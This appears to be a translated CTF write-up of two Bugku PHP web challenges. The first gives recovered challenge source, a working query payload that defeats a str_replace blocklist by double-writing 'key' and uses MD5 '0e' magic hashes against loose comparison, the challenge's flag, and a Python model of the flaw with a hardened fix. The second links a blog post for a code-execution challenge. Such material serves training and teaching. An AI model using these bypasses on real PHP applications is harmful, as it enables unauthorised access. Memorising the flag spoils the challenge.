CTF code audit (2)

1. bugku: backup is a good habit

URL: http://123.206.87.240:8002/web16/

The page shows nothing. Since the title talks about backup files, I appended .bak to the filename in the URL to request the backup copy.

Get the source code:

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
 */

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');   // strstr(str1, str2) searches str1 for str2 and, if found, returns str2 together with everything after it
$str = substr($str, 1);                        // substr() with the third (length) parameter omitted takes from offset 1 to the end, dropping the leading '?'
$str = str_replace('key', '', $str);           // str_replace("world", "shanghai", "Hello world!") turns "Hello world" into "Hello shanghai"

// The input parameters have "key" replaced with the empty string, so "key" has to be double-written to get past the filter

parse_str($str);
echo md5($key1);
echo md5($key2);
if (md5($key1) == md5($key2) && $key1 !== $key2) {
    echo $flag."取得flag";   // "取得flag" means "got the flag"
}
?>

Construct the payload:

?kkeyey1=240610708&kkeyey2=aabC9RqS

Get the flag: Bugku{OH_YOU_FIND_MY_MOMY}
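To make the two weaknesses in that PHP check concrete, here is an added Python model of it (not part of the original writeup, and not the challenge's own code). It reproduces the single-pass str_replace filter, the parse_str step, and PHP's loose == on two "0e..." numeric strings, then places a hardened version beside it that reads only the named parameters and compares the digests byte for byte (the equivalent of === or hash_equals in PHP). The query strings are constructed samples; php_loose_eq is an approximation of PHP 5/7 string comparison that is exact for md5 hex digests.

```python
import hashlib
import re
from urllib.parse import parse_qsl

# Constructed sample: the same double-write / magic-hash query the writeup uses.
SAMPLE_QUERY = "kkeyey1=240610708&kkeyey2=aabC9RqS"

# PHP compares two numeric strings with == as numbers, so "0e462..." == "0e041..."
# is true (both evaluate to 0). An md5 hex digest is numeric only when it is
# entirely digits apart from a single 'e' followed by digits.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_eq(a: str, b: str) -> bool:
    """Approximate PHP's == for two strings (PHP 5/7 semantics)."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def strip_key_once(query: str) -> str:
    """str_replace('key', '', $str): one left-to-right pass, never re-scanned.

    Removing 'key' from 'kkeyey' leaves 'key' behind, which is why a
    blocklist filter like this does not hold.
    """
    return query.replace("key", "")


def vulnerable_check(query: str) -> bool:
    """Model of the challenge: filter, parse_str into variables, md5 ==, !==."""
    # parse_str() writes every parameter into the function's scope;
    # a dict is the closest safe stand-in here.
    params = dict(parse_qsl(strip_key_once(query)))
    key1 = params.get("key1", "")
    key2 = params.get("key2", "")
    h1 = hashlib.md5(key1.encode()).hexdigest()
    h2 = hashlib.md5(key2.encode()).hexdigest()
    return php_loose_eq(h1, h2) and key1 != key2


def hardened_check(query: str) -> bool:
    """Hardened form: read only the two expected parameters and compare the raw
    digests exactly, so two different inputs pass only on a real MD5 collision,
    not on a pair of '0e...' digests."""
    params = dict(parse_qsl(query))
    key1 = params.get("key1", "")
    key2 = params.get("key2", "")
    h1 = hashlib.md5(key1.encode()).digest()
    h2 = hashlib.md5(key2.encode()).digest()
    return h1 == h2 and key1 != key2  # bytes == is exact, like PHP === / hash_equals


if __name__ == "__main__":
    print("after filter:", strip_key_once(SAMPLE_QUERY))
    print("vulnerable check passes:", vulnerable_check(SAMPLE_QUERY))
    print("hardened check passes:", hardened_check("key1=240610708&key2=aabC9RqS"))
```

Running it shows the filter turning `kkeyey1` back into `key1`, the loose comparison accepting the two magic-hash values, and the hardened check rejecting the same pair. The fix in real code is the same as in the hardened function: compare hashes with === or hash_equals, and never let parse_str populate variables from raw input.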
2. bugku: local include
URL: http://123.206.87.240:8003/
A code-execution vulnerability. There are too many ways to build the payload (the eval command method among them) to cover here, so I recommend this blog post: https://blog.csdn.net/xuchen16/article/details/82734758

PHP knowledge used here: strstr(), str_replace(), and $_REQUEST, which holds both GET and POST parameters.

Source: www.cnblogs.com/tlbjiayou/p/11030905.html